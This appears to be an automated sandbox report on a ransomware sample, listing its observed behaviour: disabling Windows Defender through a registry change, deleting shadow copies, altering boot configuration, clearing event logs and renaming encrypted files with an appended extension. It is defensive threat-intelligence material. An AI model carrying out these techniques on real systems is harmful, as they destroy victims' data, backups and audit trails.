Analysis Overview
SHA256
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
Threat Level: Known bad
The file 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Hive
Modifies security service
Modifies Windows Defender Real-time Protection settings
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Runs net.exe
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 10:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 10:06
Reported
2022-01-13 10:11
Platform
win7-en-20211208
Max time kernel
116s
Max time network
10s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\StopSet.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteRestart.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinDeny.crw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PushRemove.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupResolve.png.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InstallConvertTo.raw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MeasureStep.raw.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WatchSet.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResolveExit.tiff.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SAVE.GIF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\wmpnetwk.exe.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0212957.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\ShvlRes.dll.mui.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\WIND.WAV.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\settings.html | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXT.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44B.GIF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18245_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\weather.html | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200151.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14795_.GIF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Manuscript.dotx.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\PipelineSegments.store.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ENVELOPR.DLL.IDX_DLL.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\THMBNAIL.PNG.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00177_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe AIR\sentinel.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\THMBNAIL.PNG.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\TestApprove.asf.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00452_.WMF.riFo07dAxAnddJwVSmQWDiAUUR2wiF47IJAB9seWf_L_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
